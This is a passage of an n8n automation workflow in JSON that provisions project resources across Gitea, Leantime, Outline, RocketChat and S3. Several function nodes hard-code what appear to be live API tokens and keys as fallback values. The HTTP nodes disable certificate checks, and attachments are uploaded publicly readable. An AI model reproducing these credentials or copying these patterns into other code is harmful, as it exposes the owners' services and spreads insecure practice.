console.error('Response body:', JSON.stringify(input.body || input));\n \n // Continue with a placeholder token instead of throwing an error\n return { json: { \n ...input, // Preserve all original data\n access_token: 'NO_TOKEN_RECEIVED',\n error: 'Token missing in Keycloak response',\n errorDetails: JSON.stringify(input.body || input)\n }};\n}\n\nconsole.log('Keycloak token received successfully');\n\n// Create new object to ensure ALL input data is preserved and passed through\nconst result = {};\n\n// First, copy ALL properties from the input\nfor (const key in input) {\n if (input.hasOwnProperty(key)) {\n result[key] = input[key];\n }\n}\n\n// Then add/override the access token and ensure critical properties exist\nresult.access_token = access_token;\n\n// Double-check that critical mission data is preserved\nresult.missionProcessed = input.missionProcessed || {};\nresult.missionOriginal = input.missionOriginal || {};\nresult.config = input.config || {};\nresult.logoUrl = input.logoUrl || '';\nresult.publicUrl = input.publicUrl || '';\nresult.attachmentUrls = input.attachmentUrls || [];\n\n// Ensure missionProcessed has all required fields\nif (!result.missionProcessed.sanitizedName) {\n result.missionProcessed.sanitizedName = result.missionProcessed.name ? 
\n result.missionProcessed.name.toLowerCase().replace(/[^a-z0-9]+/g, '-') : \n `mission-${Date.now()}`;\n}\n\nif (!result.missionProcessed.description) {\n result.missionProcessed.description = 'Mission documentation';\n}\n\nif (!Array.isArray(result.missionProcessed.rocketChatUsernames)) {\n result.missionProcessed.rocketChatUsernames = [];\n}\n\n// Ensure config has all required fields\nif (!result.config.ROCKETCHAT_API_URL) {\n result.config.ROCKETCHAT_API_URL = 'https://parole.slm-lab.net/';\n}\n\nif (!result.config.ROCKETCHAT_AUTH_TOKEN) {\n result.config.ROCKETCHAT_AUTH_TOKEN = 'w91TYgkH-Z67Oz72usYdkW5TZLLRwnre7qyAhp7aHJB';\n}\n\nif (!result.config.ROCKETCHAT_USER_ID) {\n result.config.ROCKETCHAT_USER_ID = 'Tpuww59PJKsrGNQJB';\n}\n\nif (!result.config.OUTLINE_API_URL) {\n result.config.OUTLINE_API_URL = 'https://chapitre.slm-lab.net/api';\n}\n\nif (!result.config.OUTLINE_API_TOKEN) {\n result.config.OUTLINE_API_TOKEN = 'ol_api_tlLlANBfcoJ4l7zA8GOcpduAeL6QyBTcYvEnlN';\n}\n\n// Log the final result for debugging\nconsole.log('Process Token - Final Result:', {\n hasMissionProcessed: !!result.missionProcessed,\n hasConfig: !!result.config,\n sanitizedName: result.missionProcessed.sanitizedName,\n description: result.missionProcessed.description,\n rocketChatUsernames: result.missionProcessed.rocketChatUsernames,\n hasRocketChatConfig: !!(result.config.ROCKETCHAT_API_URL && result.config.ROCKETCHAT_AUTH_TOKEN && result.config.ROCKETCHAT_USER_ID),\n hasOutlineConfig: !!(result.config.OUTLINE_API_URL && result.config.OUTLINE_API_TOKEN)\n});\n\n// Return the enhanced object\nreturn { json: result };" - }, - "name": "Process Token", - "type": "n8n-nodes-base.function", - "typeVersion": 1, - "position": [ - 160, - 680 - ], - "id": "7bdee26f-dccb-42eb-8204-f5260577bf7b", - "continueOnFail": true - }, - { - "parameters": { - "functionCode": "// Debug function to check what data is flowing to RocketChat and Documentation\nconst input = $input.item.json;\n\n// Enhanced logging for service nodes\nconsole.log('DEBUG - Detailed Service Data Flow:', {\n // Mission Data\n 'missionProcessed exists': !!input.missionProcessed,\n 'missionProcessed.sanitizedName': input.missionProcessed?.sanitizedName,\n 'missionProcessed.name': input.missionProcessed?.name,\n \n // RocketChat specific\n 'rocketChatUsernames': input.missionProcessed?.rocketChatUsernames,\n 'rocketChatUsernames length': input.missionProcessed?.rocketChatUsernames?.length,\n 'rocketChatUsernames type': typeof input.missionProcessed?.rocketChatUsernames,\n 'ROCKETCHAT_API_URL': input.config?.ROCKETCHAT_API_URL,\n 'ROCKETCHAT_AUTH_TOKEN exists': !!input.config?.ROCKETCHAT_AUTH_TOKEN,\n 'ROCKETCHAT_USER_ID exists': !!input.config?.ROCKETCHAT_USER_ID,\n \n // Documentation specific\n 'OUTLINE_API_URL': input.config?.OUTLINE_API_URL,\n 'OUTLINE_API_TOKEN exists': !!input.config?.OUTLINE_API_TOKEN,\n 'mission description': input.missionProcessed?.description,\n \n // Common data\n 'logoUrl': input.logoUrl,\n 'config exists': !!input.config,\n 'keycloak token': input.access_token?.substring(0, 10) + '...',\n 'LEANTIME_API_URL': input.config?.LEANTIME_API_URL\n});\n\n// Create a copy of the input data to ensure we don't modify the original\nconst output = { ...input };\n\n// Ensure missionProcessed exists and has required fields\noutput.missionProcessed = output.missionProcessed || {};\n\n// Ensure sanitizedName exists\nif (!output.missionProcessed.sanitizedName) {\n output.missionProcessed.sanitizedName = output.missionProcessed.name ? 
\n output.missionProcessed.name.toLowerCase().replace(/[^a-z0-9]+/g, '-') : \n `mission-${Date.now()}`;\n}\n\n// Ensure description exists\nif (!output.missionProcessed.description) {\n output.missionProcessed.description = 'Mission documentation';\n}\n\n// Ensure rocketChatUsernames is an array\nif (!Array.isArray(output.missionProcessed.rocketChatUsernames)) {\n output.missionProcessed.rocketChatUsernames = [];\n}\n\n// Ensure config exists and has required fields\noutput.config = output.config || {};\n\n// Ensure RocketChat config exists\nif (!output.config.ROCKETCHAT_API_URL) {\n output.config.ROCKETCHAT_API_URL = 'https://parole.slm-lab.net/';\n}\nif (!output.config.ROCKETCHAT_AUTH_TOKEN) {\n output.config.ROCKETCHAT_AUTH_TOKEN = 'w91TYgkH-Z67Oz72usYdkW5TZLLRwnre7qyAhp7aHJB';\n}\nif (!output.config.ROCKETCHAT_USER_ID) {\n output.config.ROCKETCHAT_USER_ID = 'Tpuww59PJKsrGNQJB';\n}\n\n// Ensure Documentation config exists\nif (!output.config.OUTLINE_API_URL) {\n output.config.OUTLINE_API_URL = 'https://chapitre.slm-lab.net/api';\n}\nif (!output.config.OUTLINE_API_TOKEN) {\n output.config.OUTLINE_API_TOKEN = 'ol_api_tlLlANBfcoJ4l7zA8GOcpduAeL6QyBTcYvEnlN';\n}\n\n// Log the final output for debugging\nconsole.log('Debug Service Data - Final Output:', {\n hasMissionProcessed: !!output.missionProcessed,\n hasConfig: !!output.config,\n sanitizedName: output.missionProcessed.sanitizedName,\n description: output.missionProcessed.description,\n rocketChatUsernames: output.missionProcessed.rocketChatUsernames,\n hasRocketChatConfig: !!(output.config.ROCKETCHAT_API_URL && output.config.ROCKETCHAT_AUTH_TOKEN && output.config.ROCKETCHAT_USER_ID),\n hasOutlineConfig: !!(output.config.OUTLINE_API_URL && output.config.OUTLINE_API_TOKEN)\n});\n\n// Return the enhanced object\nreturn { json: output };" - }, - "name": "Debug Service Data", - "type": "n8n-nodes-base.function", - "typeVersion": 1, - "position": [ - 160, - 880 - ], - "id": "2e46ba3f-1466-4eb2-9868-126552f389bc" - }, - { - "parameters": { - "conditions": { - "boolean": [ - { - "value1": "={{ $json.missionProcessed.services.includes('Gite') || $json.missionProcessed.services.includes('Calcul') }}", - "value2": true - } - ] - } - }, - "name": "IF Needs Git Repository", - "type": "n8n-nodes-base.if", - "typeVersion": 1, - "position": [ - 140, - 500 - ], - "id": "014e0ad5-dc21-4e21-be9f-fcc085aa0ca8" - }, - { - "parameters": { - "method": "POST", - "url": "={{ $node['Process Mission Data'].json.config.GITEA_API_URL + '/user/repos' }}", - "sendHeaders": true, - "headerParameters": { - "parameters": [ - { - "name": "Content-Type", - "value": "application/json" - }, - { - "name": "Authorization", - "value": "={{ 'token ' + $node['Process Mission Data'].json.config.GITEA_API_TOKEN }}" - } - ] - }, - "sendBody": true, - "bodyParameters": { - "parameters": [ - { - "name": "name", - "value": "={{ $node['Process Mission Data'].json.missionProcessed.sanitizedName }}" - }, - { - "name": "private", - "value": "={{ true }}" - }, - { - "name": "auto_init", - "value": "={{ true }}" - }, - { - "name": "avatar_url", - "value": "={{ $node['Process Upload Results'].json.logoUrl }}" - } - ] - }, - "options": { - "allowUnauthorizedCerts": true, - "response": { - "response": { - "fullResponse": true - } - }, - "timeout": 30000 - } - }, - "name": "Create Git Repository", - "type": "n8n-nodes-base.httpRequest", - "typeVersion": 3, - "position": [ - 460, - 460 - ], - "id": "016939d6-a0d9-4f44-9c02-1a289cd39243", - "errorMessage": "={{ $json.error?.message || 'Unknown 
error creating Git repository' }}", - "continueOnFail": true - }, - { - "parameters": { - "method": "POST", - "url": "={{ $node['Process Mission Data'].json.config.LEANTIME_API_URL + '/api/jsonrpc' }}", - "sendHeaders": true, - "headerParameters": { - "parameters": [ - { - "name": "Content-Type", - "value": "application/json" - }, - { - "name": "X-API-Key", - "value": "={{ $node['Process Mission Data'].json.config.LEANTIME_API_TOKEN }}" - } - ] - }, - "sendBody": true, - "bodyParameters": { - "parameters": [ - { - "name": "method", - "value": "leantime.rpc.Projects.Projects.addProject" - }, - { - "name": "jsonrpc", - "value": "2.0" - }, - { - "name": "id", - "value": "1" - }, - { - "name": "params", - "value": "={{ { values: { name: $node['Process Mission Data'].json.missionProcessed.name, clientId: $node['Process Mission Data'].json.missionProcessed.clientId, details: $node['Process Mission Data'].json.missionProcessed.intention, type: 'project', start: $node['Process Mission Data'].json.missionProcessed.startDate, end: $node['Process Mission Data'].json.missionProcessed.endDate, status: 'open', psettings: 'restricted', avatar: $node['Process Upload Results'].json.logoUrl } } }}" - } - ] - }, - "options": { - "allowUnauthorizedCerts": true, - "response": { - "response": { - "fullResponse": true - } - }, - "timeout": 30000 - } - }, - "name": "Create Leantime Project", - "type": "n8n-nodes-base.httpRequest", - "typeVersion": 3, - "position": [ - 460, - 620 - ], - "id": "49e76ac2-2dbf-497a-bdce-2eefd09acabb", - "continueOnFail": true - }, - { - "parameters": { - "method": "POST", - "url": "={{ $node['Process Mission Data'].json.config.OUTLINE_API_URL + '/collections.create' }}", - "sendHeaders": true, - "headerParameters": { - "parameters": [ - { - "name": "Content-Type", - "value": "application/json" - }, - { - "name": "Authorization", - "value": "={{ 'Bearer ' + $node['Process Mission Data'].json.config.OUTLINE_API_TOKEN }}" - } - ] - }, - "sendBody": true, - "bodyParameters": { - "parameters": [ - { - "name": "name", - "value": "={{ $node['Process Mission Data'].json.missionProcessed.sanitizedName }}" - }, - { - "name": "description", - "value": "={{ $node['Process Mission Data'].json.missionProcessed.description || 'Mission documentation' }}" - }, - { - "name": "color", - "value": "#4f46e5" - }, - { - "name": "permission", - "value": "read" - }, - { - "name": "private", - "value": "={{ true }}" - }, - { - "name": "avatarUrl", - "value": "={{ $node['Process Upload Results'].json.logoUrl }}" - } - ] - }, - "options": { - "allowUnauthorizedCerts": true, - "response": { - "response": { - "fullResponse": true - } - }, - "timeout": 30000 - } - }, - "name": "Create Documentation Collection", - "type": "n8n-nodes-base.httpRequest", - "typeVersion": 3, - "position": [ - 480, - 940 - ], - "id": "edbefc50-bdf2-4807-996d-f06c3e5d526a", - "continueOnFail": true - }, - { - "parameters": { - "method": "POST", - "url": "={{ $node['Process Mission Data'].json.config.ROCKETCHAT_API_URL + '/api/v1/channels.create' }}", - "sendHeaders": true, - "headerParameters": { - "parameters": [ - { - "name": "Content-Type", - "value": "application/json" - }, - { - "name": "X-Auth-Token", - "value": "={{ $node['Process Mission Data'].json.config.ROCKETCHAT_AUTH_TOKEN }}" - }, - { - "name": "X-User-Id", - "value": "={{ $node['Process Mission Data'].json.config.ROCKETCHAT_USER_ID }}" - } - ] - }, - "sendBody": true, - "bodyParameters": { - "parameters": [ - { - "name": "name", - "value": "={{ $node['Process Mission 
Data'].json.missionProcessed.sanitizedName }}" - }, - { - "name": "members", - "value": "={{ Array.isArray($node['Process Mission Data'].json.missionProcessed.rocketChatUsernames) ? $node['Process Mission Data'].json.missionProcessed.rocketChatUsernames : [] }}" - }, - { - "name": "readOnly", - "value": "false" - }, - { - "name": "avatarUrl", - "value": "={{ $node['Process Upload Results'].json.logoUrl }}" - } - ] - }, - "options": { - "allowUnauthorizedCerts": true, - "response": { - "response": { - "fullResponse": true - } - }, - "timeout": 30000 - } - }, - "name": "Create RocketChat Channel", - "type": "n8n-nodes-base.httpRequest", - "typeVersion": 3, - "position": [ - 460, - 760 - ], - "id": "fd2abbe2-ff12-4ab0-9308-115eb2a1da14", - "continueOnFail": true - }, - { - "parameters": { - "functionCode": "// Combine results from all integrations with better error handling\ntry {\n // Defensively get results from each service node\n let gitRepoResult = {};\n let leantimeResult = {};\n let docCollectionResult = {};\n let rocketChatResult = {};\n let uploadResults = {};\n let keycloakToken = {};\n \n try { \n gitRepoResult = $node['Create Git Repository']?.json || {};\n console.log('Git repo node executed successfully'); \n } catch (e) { \n console.log('Git repo node not executed yet, continuing anyway'); \n }\n \n try { \n leantimeResult = $node['Create Leantime Project']?.json || {};\n console.log('Leantime node executed successfully');\n } catch (e) { \n console.log('Leantime node not executed yet, continuing anyway'); \n }\n \n try { \n docCollectionResult = $node['Create Documentation Collection']?.json || {};\n console.log('Documentation node executed successfully');\n } catch (e) { \n console.log('Documentation node not executed yet, continuing anyway'); \n }\n \n try { \n rocketChatResult = $node['Create RocketChat Channel']?.json || {};\n console.log('RocketChat node executed successfully');\n } catch (e) { \n console.log('RocketChat node not executed yet, continuing anyway'); \n }\n \n try { \n uploadResults = $node['Process Upload Results']?.json || {};\n console.log('Upload Results available');\n } catch (e) { \n console.log('Upload Results not available, continuing anyway'); \n }\n \n try { \n keycloakToken = $node['Process Token']?.json || {};\n console.log('Keycloak token available');\n } catch (e) { \n console.log('Keycloak token not available, continuing anyway'); \n }\n \n // Track which resources were actually created vs already existed\n const resourceStatus = {\n gitRepo: false,\n leantimeProject: false,\n docCollection: false,\n rocketChatChannel: false\n };\n \n // Process Git repository result\n if (gitRepoResult.error?.includes('already exists')) {\n console.log('Git repository already exists');\n gitRepoResult = { exists: true };\n } else if (gitRepoResult.body?.body?.html_url) {\n resourceStatus.gitRepo = true;\n console.log('Git repository created successfully with URL:', gitRepoResult.body.body.html_url);\n }\n \n // Process Leantime project result - Updated to check for array result\n if (leantimeResult.error?.includes('already exists')) {\n console.log('Leantime project already exists');\n leantimeResult = { exists: true };\n } else if (leantimeResult.body?.result && Array.isArray(leantimeResult.body.result) && leantimeResult.body.result.length > 0) {\n resourceStatus.leantimeProject = true;\n console.log('Leantime project created successfully with ID:', leantimeResult.body.result[0]);\n }\n \n // Process Documentation collection result - Updated to check for 
data wrapper\n if (docCollectionResult.error?.includes('already exists')) {\n console.log('Documentation collection already exists');\n docCollectionResult = { exists: true };\n } else if (docCollectionResult.body?.data?.id) {\n resourceStatus.docCollection = true;\n console.log('Documentation collection created successfully with ID:', docCollectionResult.body.data.id);\n }\n \n // Process RocketChat channel result\n if (rocketChatResult.error?.includes('error-duplicate-channel-name')) {\n console.log('RocketChat channel already exists');\n rocketChatResult = { exists: true };\n } else if (rocketChatResult.body?.channel?._id) {\n resourceStatus.rocketChatChannel = true;\n }\n \n // Gather information about what executed\n const executedNodes = [];\n if (Object.keys(gitRepoResult).length > 0) executedNodes.push('Git');\n if (Object.keys(leantimeResult).length > 0) executedNodes.push('Leantime');\n if (Object.keys(docCollectionResult).length > 0) executedNodes.push('Documentation');\n if (Object.keys(rocketChatResult).length > 0) executedNodes.push('RocketChat');\n \n console.log(`Executed nodes (${executedNodes.length}): ${executedNodes.join(', ')}`);\n \n // Handle empty results with empty objects to prevent errors\n const results = {\n gitRepo: gitRepoResult.error ? { error: gitRepoResult.error.message || 'Git repository creation failed' } : (gitRepoResult.body?.body || gitRepoResult.body || gitRepoResult || {}),\n leantimeProject: leantimeResult.error ? { error: leantimeResult.error.message || 'Leantime project creation failed' } : (leantimeResult.body || leantimeResult || {}),\n docCollection: docCollectionResult.error ? { error: docCollectionResult.error.message || 'Documentation collection creation failed' } : (docCollectionResult.body || docCollectionResult || {}),\n rocketChatChannel: rocketChatResult.error ? 
{ error: rocketChatResult.error.message || 'RocketChat channel creation failed' } : (rocketChatResult.body || rocketChatResult || {}),\n uploadResults: uploadResults || {},\n keycloakToken: keycloakToken || {},\n executedNodes: executedNodes,\n resourceStatus: resourceStatus\n };\n \n // Log key details for debugging\n console.log('Git repo HTML URL:', results.gitRepo?.html_url || 'not available');\n console.log('Leantime project ID:', results.leantimeProject?.result?.[0] || 'not available');\n console.log('Documentation ID:', results.docCollection?.data?.id || 'not available');\n console.log('RocketChat channel ID:', results.rocketChatChannel?.channel?._id || 'not available');\n \n return results;\n} catch (error) {\n console.error('Error in Combine Results:', error);\n // Return minimal object to allow workflow to continue\n return {\n error: `Error combining results: ${error.message}`,\n gitRepo: {},\n leantimeProject: {},\n docCollection: {},\n rocketChatChannel: {}\n };\n}" - }, - "name": "Combine Results", - "type": "n8n-nodes-base.function", - "typeVersion": 1, - "position": [ - 660, - 600 - ], - "id": "d4be7e93-0a23-4c7b-b936-91fe88e531ae", - "continueOnFail": true - }, - { - "parameters": { - "method": "POST", - "url": "={{ $node['Process Mission Data'].json.config.MISSION_API_URL + '/mission-created' }}", - "sendHeaders": true, - "headerParameters": { - "parameters": [ - { - "name": "Content-Type", - "value": "application/json" - }, - { - "name": "x-api-key", - "value": "={{ $node['Process Mission Data'].json.config.N8N_API_KEY }}" - } - ] - }, - "sendBody": true, - "bodyParameters": { - "parameters": [ - { - "name": "name", - "value": "={{ $node['Process Mission Data'].json.missionProcessed.name }}" - }, - { - "name": "niveau", - "value": "={{ $node['Process Mission Data'].json.missionProcessed.niveau || 'default' }}" - }, - { - "name": "intention", - "value": "={{ $node['Process Mission Data'].json.missionProcessed.intention }}" - }, - { - "name": "description", - "value": "={{ $node['Process Mission Data'].json.missionProcessed.description }}" - }, - { - "name": "logo", - "value": "={{ $node['Process Upload Results'].json.logoUrl }}" - }, - { - "name": "attachments", - "value": "={{ $node['Process Upload Results'].json.attachmentUrls }}" - }, - { - "name": "gitRepoUrl", - "value": "={{ $node['Combine Results'].json.gitRepo?.html_url || '' }}" - }, - { - "name": "leantimeProjectId", - "value": "={{ $node['Combine Results'].json.leantimeProject?.result?.[0] || '' }}" - }, - { - "name": "documentationCollectionId", - "value": "={{ $node['Combine Results'].json.docCollection?.data?.id || '' }}" - }, - { - "name": "rocketchatChannelId", - "value": "={{ $node['Combine Results'].json.rocketChatChannel?.channel?._id || '' }}" - }, - { - "name": "donneurDOrdre", - "value": "={{ $node['Process Mission Data'].json.missionProcessed.donneurDOrdre || 'default' }}" - }, - { - "name": "projection", - "value": "={{ $node['Process Mission Data'].json.missionProcessed.projection || 'default' }}" - }, - { - "name": "missionType", - "value": "={{ $node['Process Mission Data'].json.missionProcessed.missionType || 'default' }}" - }, - { - "name": "creatorId", - "value": "={{ $node['Process Mission Data'].json.creatorId }}" - } - ] - }, - "options": { - "response": { - "response": { - "fullResponse": true - } - }, - "timeout": 30000 - } - }, - "name": "Save Mission To API", - "type": "n8n-nodes-base.httpRequest", - "typeVersion": 3, - "position": [ - 820, - 600 - ], - "id": 
"dedd43e5-6b46-4dba-8eeb-008648549344" - }, - { - "parameters": { - "jsCode": "// Defensive access to all nodes\nconst missionData = $node['Process Mission Data']?.json?.missionProcessed || {};\nconst integrationResults = $node['Combine Results']?.json || {};\nconst saveMissionResult = $node['Save Mission To API']?.json || {};\nconst errors = [];\nconst warnings = [];\n\n// Check for actual errors vs expected failures\nif (saveMissionResult.error) {\n errors.push(`Failed to save mission: ${saveMissionResult.error.message || 'Unknown error'}`);\n}\n\n// Track which resources were actually created vs already existed\nconst resourceStatus = {\n gitRepo: false,\n leantimeProject: false,\n docCollection: false,\n rocketChatChannel: false\n};\n\n// Check if Git repository is needed\nconst needsGitRepo = Array.isArray(missionData.services) && \n (missionData.services.includes('Gite') || missionData.services.includes('Calcul'));\n\n// Process Git repository result only if needed\nif (needsGitRepo) {\n if (integrationResults.gitRepo?.html_url) {\n resourceStatus.gitRepo = true;\n console.log('Git repository created successfully');\n } else if (integrationResults.gitRepo?.error?.includes('already exists')) {\n console.log('Git repository already exists, this is expected');\n warnings.push('Git repository already exists');\n } else if (integrationResults.gitRepo?.error) {\n errors.push(`Git repository creation failed: ${integrationResults.gitRepo.error}`);\n } else {\n errors.push('Git repository creation failed: Unknown error');\n }\n} else {\n console.log('Git repository not needed for this mission');\n resourceStatus.gitRepo = true; // Mark as successful since it's not needed\n}\n\n// Process Leantime project result\nif (integrationResults.leantimeProject?.error?.includes('already exists')) {\n console.log('Leantime project already exists');\n integrationResults.leantimeProject = { exists: true };\n} else if (integrationResults.leantimeProject?.result?.[0]) {\n resourceStatus.leantimeProject = true;\n console.log('Leantime project created successfully with ID:', integrationResults.leantimeProject.result[0]);\n} else if (integrationResults.leantimeProject?.error) {\n errors.push(`Leantime project creation failed: ${integrationResults.leantimeProject.error}`);\n}\n\n// Process Documentation collection result\nif (integrationResults.docCollection?.error?.includes('already exists')) {\n console.log('Documentation collection already exists');\n integrationResults.docCollection = { exists: true };\n} else if (integrationResults.docCollection?.data?.id) {\n resourceStatus.docCollection = true;\n console.log('Documentation collection created successfully with ID:', integrationResults.docCollection.data.id);\n} else if (integrationResults.docCollection?.error) {\n errors.push(`Documentation collection creation failed: ${integrationResults.docCollection.error}`);\n}\n\n// Process RocketChat channel result\nif (integrationResults.rocketChatChannel?.error?.includes('error-duplicate-channel-name')) {\n console.log('RocketChat channel already exists');\n integrationResults.rocketChatChannel = { exists: true };\n} else if (integrationResults.rocketChatChannel?.channel?._id) {\n resourceStatus.rocketChatChannel = true;\n console.log('RocketChat channel created successfully');\n} else if (integrationResults.rocketChatChannel?.error) {\n errors.push(`RocketChat channel creation failed: ${integrationResults.rocketChatChannel.error}`);\n}\n\n// Check if any critical resources failed to create\nconst criticalFailures 
= errors.filter(error => \n !error.includes('already exists') && \n !error.includes('expected')\n);\n\n// If the mission was successfully saved, consider it a success even if some resources already exist\nconst success = saveMissionResult.body?.message === 'Mission updated successfully' || \n saveMissionResult.body?.message === 'Mission created successfully';\n\n// Determine the final status\nconst status = criticalFailures.length > 0 ? 'error' : \n warnings.length > 0 ? 'warning' : \n 'success';\n\nconst output = {\n success: success && criticalFailures.length === 0,\n status,\n error: errors.length > 0 ? errors.join('; ') : null,\n errors,\n warnings,\n missionData,\n integrationResults,\n saveMissionResult,\n resourceStatus,\n message: status === 'success' ? \n 'Mission integration complete: All systems updated successfully' : \n status === 'warning' ? \n `Mission integration complete with warnings: ${warnings.join('; ')}` : \n `Mission integration failed: ${errors.join('; ')}`\n};\n\n// Log the final status\nconsole.log('Process Results - Final Status:', {\n success: output.success,\n status: output.status,\n errors: output.errors.length,\n warnings: output.warnings.length,\n resourceStatus,\n needsGitRepo\n});\n\nreturn output;" - }, - "name": "Process Results", - "type": "n8n-nodes-base.code", - "typeVersion": 2, - "position": [ - 1000, - 600 - ], - "id": "595a8f1b-c5dd-4905-a70d-676e48670495" - }, - { - "parameters": { - "respondWith": "json", - "responseBody": "={{ $node[\"Process Results\"].json }}", - "options": {} - }, - "name": "Respond To Webhook", - "type": "n8n-nodes-base.respondToWebhook", - "typeVersion": 1, - "position": [ - 1220, - 600 - ], - "id": "870509e0-39fc-44e0-81ff-cec9f41e7522" - }, - { - "parameters": { - "operation": "upload", - "bucketName": "=missions", - "fileName": "={{$input.item.json.missionId}}/attachments/{{$input.item.json.fileName}}", - "additionalFields": { - "acl": "public-read" - } - }, - "name": "S3 Upload Attachments", - "type": "n8n-nodes-base.s3", - "typeVersion": 1, - "position": [ - -280, - 680 - ], - "id": "179cd4d0-44db-400a-b7af-044f1aff5557", - "credentials": { - "s3": { - "id": "xvSkHfsTBJxzopIj", - "name": "S3 account 2" - } - }, - "continueOnFail": true - }, - { - "parameters": { - "httpMethod": "POST", - "path": "mission-created", - "responseMode": "lastNode", - "responseData": "allEntries", - "options": {} - }, - "name": "Mission Created Webhook", - "type": "n8n-nodes-base.webhook", - "typeVersion": 1, - "position": [ - -1320, - 600 - ], - "webhookId": "mission-created", - "id": "de1fdb33-3e7c-43bc-86b9-aa3bdc3c36d0" - }, - { - "parameters": { - "conditions": { - "boolean": [ - { - "value1": "={{ $json.skipIntegrations }}" - } - ] - } - }, - "name": "IF Run Integrations", - "type": "n8n-nodes-base.if", - "typeVersion": 1, - "position": [ - 140, - 500 - ], - "id": "adfe1ad8-2657-4145-b97d-852a008f9643" - }, - { - "parameters": { - "functionCode": "// Merge paths after Process Upload Results\nconst input = $input.item.json;\n\n// Log the input for debugging\nconsole.log('Merge Paths - Input:', {\n hasInput: !!input,\n hasAttachments: input?.hasAttachments,\n skipIntegrations: input?.skipIntegrations,\n logoUrl: input?.logoUrl,\n attachmentUrls: input?.attachmentUrls,\n hasMissionProcessed: !!input?.missionProcessed,\n hasConfig: !!input?.config\n});\n\n// Get mission data from Process Mission Data node\nconst missionData = $node['Process Mission Data']?.json || {};\n\n// Ensure we have all necessary data\nconst output = {\n 
...input,\n // Ensure these fields exist even if they weren't in the input\n logoUrl: input?.logoUrl || '',\n attachmentUrls: Array.isArray(input?.attachmentUrls) ? input.attachmentUrls : [],\n hasAttachments: !!input?.hasAttachments,\n skipIntegrations: !!input?.skipIntegrations,\n // Add mission data from Process Mission Data node\n missionProcessed: {\n ...missionData.missionProcessed,\n name: missionData.missionProcessed?.name || input?.missionProcessed?.name || 'Unnamed Mission',\n sanitizedName: missionData.missionProcessed?.sanitizedName || input?.missionProcessed?.sanitizedName || 'unnamed-mission',\n intention: missionData.missionProcessed?.intention || input?.missionProcessed?.intention || '',\n description: missionData.missionProcessed?.description || input?.missionProcessed?.description || 'Mission documentation',\n startDate: missionData.missionProcessed?.startDate || input?.missionProcessed?.startDate || new Date().toISOString().split('T')[0],\n endDate: missionData.missionProcessed?.endDate || input?.missionProcessed?.endDate || new Date(Date.now() + 30 * 24 * 60 * 60 * 1000).toISOString().split('T')[0],\n missionType: missionData.missionProcessed?.missionType || input?.missionProcessed?.missionType || 'default',\n guardians: missionData.missionProcessed?.guardians || input?.missionProcessed?.guardians || {},\n volunteers: Array.isArray(missionData.missionProcessed?.volunteers) ? missionData.missionProcessed.volunteers : (Array.isArray(input?.missionProcessed?.volunteers) ? input.missionProcessed.volunteers : []),\n profils: Array.isArray(missionData.missionProcessed?.profils) ? missionData.missionProcessed.profils : (Array.isArray(input?.missionProcessed?.profils) ? input.missionProcessed.profils : []),\n services: Array.isArray(missionData.missionProcessed?.services) ? missionData.missionProcessed.services : (Array.isArray(input?.missionProcessed?.services) ? input.missionProcessed.services : []),\n clientId: missionData.missionProcessed?.clientId || input?.missionProcessed?.clientId || 2,\n rocketChatUsernames: Array.isArray(missionData.missionProcessed?.rocketChatUsernames) ? missionData.missionProcessed.rocketChatUsernames : (Array.isArray(input?.missionProcessed?.rocketChatUsernames) ? 
input.missionProcessed.rocketChatUsernames : [])\n },\n config: {\n ...missionData.config,\n GITEA_API_URL: missionData.config?.GITEA_API_URL || input?.config?.GITEA_API_URL || 'https://gite.slm-lab.net/api/v1',\n GITEA_API_TOKEN: missionData.config?.GITEA_API_TOKEN || input?.config?.GITEA_API_TOKEN || '310645d564cbf752be1fe3b42582a3d5f5d0bddd',\n GITEA_OWNER: missionData.config?.GITEA_OWNER || input?.config?.GITEA_OWNER || 'alma',\n LEANTIME_API_URL: missionData.config?.LEANTIME_API_URL || input?.config?.LEANTIME_API_URL || 'https://agilite.slm-lab.net',\n LEANTIME_API_TOKEN: missionData.config?.LEANTIME_API_TOKEN || input?.config?.LEANTIME_API_TOKEN || 'lt_lsdShQdoYHaPUWuL07XZR1Rf3GeySsIs_UDlll3VJPk5EwAuILpMC4BwzJ9MZFRrb',\n ROCKETCHAT_API_URL: missionData.config?.ROCKETCHAT_API_URL || input?.config?.ROCKETCHAT_API_URL || 'https://parole.slm-lab.net/',\n ROCKETCHAT_AUTH_TOKEN: missionData.config?.ROCKETCHAT_AUTH_TOKEN || input?.config?.ROCKETCHAT_AUTH_TOKEN || 'w91TYgkH-Z67Oz72usYdkW5TZLLRwnre7qyAhp7aHJB',\n ROCKETCHAT_USER_ID: missionData.config?.ROCKETCHAT_USER_ID || input?.config?.ROCKETCHAT_USER_ID || 'Tpuww59PJKsrGNQJB',\n OUTLINE_API_URL: missionData.config?.OUTLINE_API_URL || input?.config?.OUTLINE_API_URL || 'https://chapitre.slm-lab.net/api',\n OUTLINE_API_TOKEN: missionData.config?.OUTLINE_API_TOKEN || input?.config?.OUTLINE_API_TOKEN || 'ol_api_tlLlANBfcoJ4l7zA8GOcpduAeL6QyBTcYvEnlN',\n MISSION_API_URL: missionData.config?.MISSION_API_URL || input?.config?.MISSION_API_URL || 'https://hub.slm-lab.net',\n N8N_API_KEY: missionData.config?.N8N_API_KEY || input?.config?.N8N_API_KEY || 'LwgeE1ntADD20OuWC88S3pR0EaO7FtO4'\n },\n creatorId: missionData.creatorId || input?.creatorId\n};\n\n// Log the output for debugging\nconsole.log('Merge Paths - Output:', {\n hasLogoUrl: !!output.logoUrl,\n attachmentUrlsCount: output.attachmentUrls.length,\n hasAttachments: output.hasAttachments,\n skipIntegrations: output.skipIntegrations,\n hasMissionProcessed: !!output.missionProcessed,\n hasConfig: !!output.config,\n missionName: output.missionProcessed?.name,\n missionType: output.missionProcessed?.missionType,\n services: output.missionProcessed?.services\n});\n\nreturn { json: output };" - }, - "name": "Merge Paths", - "type": "n8n-nodes-base.function", - "typeVersion": 1, - "position": [ - 0, - 600 - ], - "id": "7d8692fa-9e3c-4c57-8995-36bb58a33345" - }, - { - "parameters": { - "functionCode": "// Get the input from the previous node\nconst input = $input.item.json;\n\n// Log the full input for debugging\nconsole.log('Set Logo Path - Full Input:', JSON.stringify(input, null, 2));\n\n// Get sanitizedName from Process Mission Data node\nconst missionData = $node['Process Mission Data']?.json?.missionProcessed || {};\nconst sanitizedName = missionData.sanitizedName || '';\n\n// Construct the path using sanitizedName\nconst logoPath = sanitizedName ? `${sanitizedName}/logo.png` : '';\n\n// Construct the full URL using the MinIO endpoint\nconst logoUrl = logoPath ? 
